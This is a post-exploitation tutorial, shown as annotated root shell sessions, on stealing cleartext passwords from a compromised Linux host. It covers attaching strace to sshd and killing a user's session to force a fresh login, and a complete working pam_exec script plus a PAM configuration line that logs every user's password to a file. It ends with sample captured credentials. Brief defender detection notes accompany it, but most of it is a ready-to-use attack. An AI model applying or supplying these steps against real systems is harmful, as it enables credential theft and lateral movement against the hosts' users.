With root on a host we can attach strace to the SSH daemon and read usernames and passwords in clear text as users authenticate: during password authentication the privilege-separated sshd child hands the password to the monitor process over a local socket, so it appears in the traced write() calls. This is useful for finding additional accounts to pivot with, or more privileged ones. Caveats: it only captures password authentication (public-key logins never send a password), it only works while strace stays attached, and the tracer is easy for a defender to spot (an strace process in the process list, or a non-zero TracerPid in /proc/&lt;pid&gt;/status of sshd).
# Who is logged in right now, and from where (a pts with a remote FROM is an
# SSH session).
[root@victimHost ~]# w
15:05:18 up 26 days, 6:25, 2 users, load average: 0.00, 0.05, 0.16
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
unixadm pts/0 someHost 15:04 6.00s 0.03s 0.00s sshd: unixadm [priv]
# Find the listening sshd (PID 1366, the parent that forks one child per
# connection) and the existing per-session processes.
[root@victimHost ~]# ps aux | grep ssh
root 1366 0.0 0.0 113000 4368 ? Ss Jun02 0:00 /usr/sbin/sshd -D
unixadm 28721 0.0 0.0 176412 2644 ? S 10:04 0:00 sshd: unixadm@pts/0
# Drop the live session so unixadm has to log in again and re-send the
# password. This is noisy -- the user sees the disconnect -- so if stealth
# matters, skip it and just wait for the next login.
[root@victimHost ~]# kill 28721
# Attach to the listener; -f follows the forked per-connection children, and
# only write() calls are recorded, into data.log in the current directory.
# Caveats: strace truncates string arguments at 32 bytes unless you pass
# -s <len> (e.g. -s 512), so longer passwords/payloads are cut off; data.log is
# created with the default umask and is never chmod'ed here, so restrict it
# yourself; attaching needs ptrace permission (kernel.yama.ptrace_scope=3 blocks
# it even for root); and the attach is visible to defenders (strace in ps,
# TracerPid != 0 in /proc/1366/status).
[root@victimHost ~]# strace -f -p 1366 -e trace=write -o data.log
strace: Process 1366 attached
Modifying PAM: logging credentials with pam_exec
## Create the helper script that pam_exec will run on every authentication.
## It has to be executable by the process running the PAM stack (root for
## sshd, login, su, sudo); 0700 root-owned keeps other users from reading
## where the captured credentials go.
$ vim /usr/local/bin/capture.sh
$ chmod 700 /usr/local/bin/capture.sh
$ cat /usr/local/bin/capture.sh
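#!/bin/sh
# pam_exec helper for an "auth optional pam_exec.so quiet expose_authtok" line.
# pam_exec runs it with the PAM items exported as environment variables
# (PAM_USER, PAM_RHOST, PAM_SERVICE, ...) and, because of expose_authtok, the
# entered password on stdin.
#
# Appends " <date> <user>, <password>, From: <rhost>" to the log file.
# The log path defaults to /var/log/creds.log and can be overridden with
# CREDS_LOG. The file holds clear-text credentials: keep it 0600 root-owned.
# pam_exec runs this with the privileges of the calling service, so a non-root
# PAM client cannot append to a root-owned log and the entry is silently lost
# (optional + quiet).

log_login() {
  # pam_exec writes the token followed by a newline; $(...) strips it.
  passwd=$(cat -)
  # printf '%s' instead of echo: dash (Debian's /bin/sh) echo interprets
  # backslash sequences in its argument, so a password containing "\n" or
  # "\c" would be mangled or truncated in the log.
  printf '%s\n' " $(date) $PAM_USER, $passwd, From: $PAM_RHOST" \
    >> "${CREDS_LOG:-/var/log/creds.log}"
}

log_login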
## Create the log file and make it root-only (0600): it will hold clear-text
## passwords, so no unprivileged user must be able to read it.
$ touch /var/log/creds.log
$ chmod 600 /var/log/creds.log
## Add the following line to /etc/pam.d/common-auth (Debian/Ubuntu; on
## RHEL-family systems the equivalent stacks are /etc/pam.d/system-auth and
## password-auth, usually generated by authselect -- edit the profile, not the
## generated file, or the change is overwritten).
## Placement matters: the stock Debian common-auth has
## "auth [success=1 default=ignore] pam_unix.so", which skips the *next* line on
## success, so append this at the end (after pam_permit.so) rather than directly
## below pam_unix.so. "optional" means a failure of the script never breaks
## authentication; "quiet" suppresses its syslog status line.
$ vim /etc/pam.d/common-auth
$ cat /etc/pam.d/common-auth
...
auth optional pam_exec.so quiet expose_authtok /usr/local/bin/capture.sh
## Every service whose PAM stack includes common-auth (sshd password auth,
## login, su, sudo, screen lockers, ...) now logs user and password in clear
## text to /var/log/creds.log. Not captured: plain SSH public-key logins (sshd
## does not run the "auth" stack for them) and services using another stack.
## Defender note: this is one pam_exec line plus two new files -- an auditd
## watch on /etc/pam.d, and comparing against the shipped file (dpkg -V /
## rpm -V flag modified config files; authselect check on RHEL) catch it.
➜ ~ cat /var/log/creds.log
## PAM_RHOST is only set by network services such as sshd; an empty "From:"
## as in the second entry means a local authentication (e.g. su, sudo or a
## console login).
Wed Nov 22 12:54:20 CET 2023 p3, Passw0rd!, From: ::1
Wed Nov 22 12:56:54 CET 2023 void, Passw0rd!, From: